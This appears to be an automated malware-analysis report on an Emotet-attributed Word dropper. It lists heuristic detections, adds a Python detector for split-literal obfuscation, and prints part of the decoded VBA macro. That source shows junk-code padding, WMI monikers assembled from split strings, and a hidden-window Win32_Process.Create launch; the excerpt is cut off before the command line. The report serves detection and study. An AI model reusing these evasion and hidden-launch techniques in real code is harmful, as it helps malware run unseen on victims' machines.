Verdict: MALICIOUS
Risk Score: 342
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
This document contains VBA macros that run automatically when the document is opened (AutoOpen). The visible macro source is padded with junk arithmetic inside If blocks that never contribute to the result, and it assembles the WMI monikers "winmgmts:Win32_ProcessStartup" and "winmgmts:Win32_Process" from short concatenated string literals so that no single literal contains a scannable keyword. The macro obtains both objects with GetObject, sets ShowWindow on the startup object to 0 (SW_HIDE), and calls Win32_Process.Create to start a hidden process. Launching through WMI also means the child is spawned by the WMI provider host (WmiPrvSE.exe) rather than by WINWORD.EXE, so detections keyed on Office spawning a shell directly will not see the usual parent-child relationship. The ClamAV signature Doc.Downloader.Emotet-6861363-0 names Emotet, and the heuristic firings are consistent with that attribution.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6861363-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note that this rule's description conflicts with the VBA source recovered below; treat it as a weak corroborating marker, not an independent finding.)
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into documents containing drawing objects; on its own it is benign.
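As an added example (not the analyzer's code and not code from the sample), the Python below reproduces the two macro heuristics above on a constructed excerpt shaped like the extracted macros.bas preview: it folds `"a" + "b"` / `"a" & "b"` concatenations and numeric `Chr(n)` calls to a fixed point, reports keywords that occur in no single original literal but do occur once folded (the split-keyword rule), and flags a folded `winmgmts:` moniker for Win32_Process together with a `.Create` call (the WMI launcher rule). The `.Create` arguments in the sample are assumed, since the real preview is cut off at `.Crea`; `PLAIN_VBA` is a constructed control that launches the same way without splitting its literals.

```python
"""Added example (not the analyzer's or the sample's code): fold VBA string
concatenation and flag the WMI Win32_Process launcher chain.
Works on olevba-style extracted source text; needs no Office or WMI access."""
import re

# Constructed excerpt in the shape of the macros.bas preview. The .Create
# arguments are assumed; the real preview is truncated at ".Crea".
SAMPLE_VBA = '''
Function G350136(O_7470, z_049_)
On Error Resume Next
Set U807_65 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
U807_65.ShowWindow = 680941 - 680941
GetObject("winmg" + "mts:Wi" + "n32_Process").Create cmd_line, Null, U807_65, pid
End Function
'''

# Constructed control: same launcher with whole literals, so the split-keyword
# rule should stay quiet while the WMI launcher rule still fires.
PLAIN_VBA = 'GetObject("winmgmts:Win32_Process").Create "calc.exe", Null, Nothing, pid\n'

STRING_LIT = re.compile(r'"([^"\n]*)"')
# Chr(n) with a plain numeric argument. Chr(34) is left alone because a bare
# quote would need VBA's doubled-quote escape, which this folder does not model.
CHR_LITERAL = re.compile(r'\bChr\((\d{1,3})\)')
# Two adjacent literals joined by + or & (VBA accepts both for strings).
CONCAT = re.compile(r'"([^"\n]*)"\s*[+&]\s*"([^"\n]*)"')
# A folded winmgmts moniker whose class is exactly Win32_Process.
MONIKER = re.compile(r'"(winmgmts:[^"]*Win32_Process)"', re.IGNORECASE)
CREATE_CALL = re.compile(r'\.Create\b', re.IGNORECASE)

# Names the split-keyword rule cares about (list taken from the rule text,
# plus the WMI names this sample splits).
KEYWORDS = ("winmgmts:", "Win32_Process", "WScript.Shell",
            "Scripting.FileSystemObject", "powershell",
            "URLDownloadToFile", "rundll32")


def fold_literals(src: str) -> str:
    """Rewrite Chr(n) as a one-character literal, then merge adjacent
    literals until nothing changes."""
    def chr_to_literal(m):
        code = int(m.group(1))
        if code == 34 or code > 255:
            return m.group(0)
        return '"' + chr(code) + '"'
    out = CHR_LITERAL.sub(chr_to_literal, src)
    while True:
        merged = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', out)
        if merged == out:
            return out
        out = merged


def split_keywords(src: str) -> list:
    """Keywords present in no single original literal but present once folded."""
    before = [s.lower() for s in STRING_LIT.findall(src)]
    after = [s.lower() for s in STRING_LIT.findall(fold_literals(src))]
    hits = []
    for kw in KEYWORDS:
        k = kw.lower()
        if any(k in s for s in after) and not any(k in s for s in before):
            hits.append(kw)
    return hits


def wmi_process_create(src: str) -> bool:
    """Folded source references a Win32_Process moniker and calls .Create."""
    folded = fold_literals(src)
    return bool(MONIKER.search(folded)) and bool(CREATE_CALL.search(folded))


def scan(src: str) -> dict:
    folded = fold_literals(src)
    return {
        "monikers": MONIKER.findall(folded),
        "split_keywords": split_keywords(src),
        "wmi_process_create": wmi_process_create(src),
    }


if __name__ == "__main__":
    for name, vba in (("sample", SAMPLE_VBA), ("control", PLAIN_VBA)):
        print(name, scan(vba))
```

The folder deliberately stops at literal concatenation and numeric `Chr()`; real Emotet droppers also hide strings behind helper functions and `Replace`/`Mid` calls, which this regex pass will not see. When the fold produces nothing but the sample still calls GetObject with an expression, that is itself a reason to run the macro in an instrumented sandbox rather than trust static extraction.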
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55613 bytes | 79f2a5b8c43300415b9c4bf74b7ac34409f78159563a33e7e05b6d7b0a08b5f2 |
Preview script: first 1,000 lines of the extracted script (the excerpt shown here is cut off early). Comments prefixed with `'` were added by the editor to mark structure; everything else is the decoded source as extracted.

```vb
' Module 1: ThisDocument (only its attribute header survives in this preview)
Attribute VB_Name = "K_2_08"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module 2: standard module holding the launcher
Attribute VB_Name = "j4_295"
' Padding: arithmetic on undeclared variables inside If blocks whose results
' are never used; it bulks out the source and defeats simple pattern matching.
Function c8_5___3()
If m39_98 <> Y3608_3 Then
N686_94 = (658516667)
Q9578_ = N_2825_ * 272507174 + D_2_4_0 + CLng(s1863_5)
G__092_1 = 358471837 / Hex(L075_9 / Chr(a68_29 - CDate(67459892)) * 592815160 / 700531426) / n_913876 - Fix(155593584)
K7_33393 = (529766171)
End If
If L72_908 <> C__3__5_ Then
p_81_4 = (874443169)
I__50_71 = j_______ * 348623678 + B577290 + CLng(h_6_8_)
G670_24 = 403778558 / Hex(k2_789 / Chr(Z8_94_ - CDate(619948513)) * 174153339 / 68311320) / G6__60_ - Fix(231617716)
L4149_ = (360189174)
End If
If N717733 <> f__478 Then
Q139_8 = (228320419)
d_528__ = F31___ * 491784028 + u2063593 + CLng(A7__7_)
k211__7 = 448827374 / Hex(b2620_ / Chr(w3917610 - CDate(287431539)) * 532469439 / 156398516) / z66__0_ - Fix(129953381)
m480_0__ = (132284882)
End If
If I5_37__ <> j4394_ Then
l_9_140 = (883022150)
D37_3695 = v6__715_ * 268924217 + U____992 + CLng(R_1_00)
o1__3_ = 353985243 / Hex(R___96_ / Chr(h16_14_ - CDate(450630859)) * 589039480 / 612189825) / n6_075 - Fix(993251557)
D9__422 = (414759823)
End If
If q_9__6 <> N_97_4 Then
I8_457 = (323547084)
G4_91_2 = t4_137__ * 177663503 + h676__6 + CLng(p689593)
L_7__6_ = 609085526 / Hex(Z89400_ / Chr(T_474218 - CDate(706887094)) * 104373762 / 720881727) / J3___0 - Fix(481731504)
I016_42 = (884549480)
End If
If L19_4_ <> V8276613 Then
w58280 = (493945827)
K59__9 = P23_8874 * 262887079 + o451_3_7 + CLng(c_48_4)
k2_97_12 = 538075221 / Hex(D_42____ / Chr(k235__3_ - CDate(264449403)) * 584631794 / 293154094) / d7_3_8_ - Fix(855862730)
i645_79 = (135304728)
End If
End Function
' The launcher. On Error Resume Next swallows any failure from the padding.
Function G350136(O_7470, z_049_)
On Error Resume Next
If N5821176 <> H3880__ Then
c9_7__4_ = (331232068)
n2_646 = o09054 * 153274469 + v603_66 + CLng(s_5_53)
m15344_0 = 401878824 / Hex(v04030__ / Chr(q071_87_ - CDate(22011249)) * 376685950 / 429566967) / Y25693_ - Fix(470913325)
W709231 = (417588160)
End If
If J8_28926 <> O9_7_1_0 Then
R56___ = (269773209)
A11_678 = C082__ * 696732665 + d425312 + CLng(J_5_55__)
m6_61_ = 659544174 / Hex(M693150 / Chr(k___196 - CDate(99869548)) * 771307238 / 249053002) / M__612 - Fix(610167845)
Z72827 = (583516965)
End If
' Win32_ProcessStartup object; the moniker "winmgmts:Win32_ProcessStartup"
' is reassembled from split literals so no single literal is scannable
Set U807_65 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
If C029__ <> i31738 Then
m2508_5 = (378174955)
A2047_ = O4_358 * 459363117 + C___92_ + CLng(p19350_9)
f5_2214 = 791777082 / Hex(m_4_757 / Chr(W1__725 - CDate(485025353)) * 56226227 / 891858061) / m9_115 - Fix(804506476)
P54_31__ = (731566215)
End If
If X1___605 <> L_7__5 Then
G82702_7 = (215563413)
X6__8_4_ = m28159__ * 775396548 + i087__ + CLng(I73_99_)
z2095_67 = 584013639 / Hex(b_9779 / Chr(U5___285 - CDate(546537556)) * 182900643 / 929628651) / P__0985 - Fix(755510670)
J8223__6 = (25532724)
End If
If j50_26 <> C8_77_ Then
S1___1 = (625120367)
X356_3_3 = s17_0214 * 181012068 + o12298 + CLng(R909393)
M5_5512_ = 868914718 / Hex(r__740 / Chr(L530__ - CDate(850333861)) * 161519900 / 161283464) / F715__ - Fix(935657431)
A12_4_9 = (574865834)
End If
' ShowWindow = 0 (SW_HIDE): the launched process gets no visible window
U807_65.ShowWindow = 680941 - 680941
If C9105_ <> w_4__18 Then
z10___3 = (419013575)
l6232_ = R1__8__1 * 840030804 + I5320_ + CLng(O2__44)
L__32_43 = 346899847 / Hex(Z_3_17 / Chr(z846307_ - CDate(704508968)) * 611833071 / 200329064) / C293184 - Fix(324876611)
o___6240 = (325223584)
End If
If X14_861 <> f5___1 Then
L552_8_4 = (385787104)
J736_540 = E_8065 * 982598202 + m8371857 + CLng(O93528_)
z7066027 = 780189698 / Hex(L198571 / Chr(s9_92_ - CDate(679105277)) * 940439478 / 500500231) / f__962 - Fix(155949449)
v181254_ = (647020961)
End If
' Win32_Process.Create with the hidden-window startup object; the preview
' is cut off mid-call, so the command line is not visible here
GetObject("winmg" + "mts:Wi" + "n32_Process").Crea
```

... (truncated)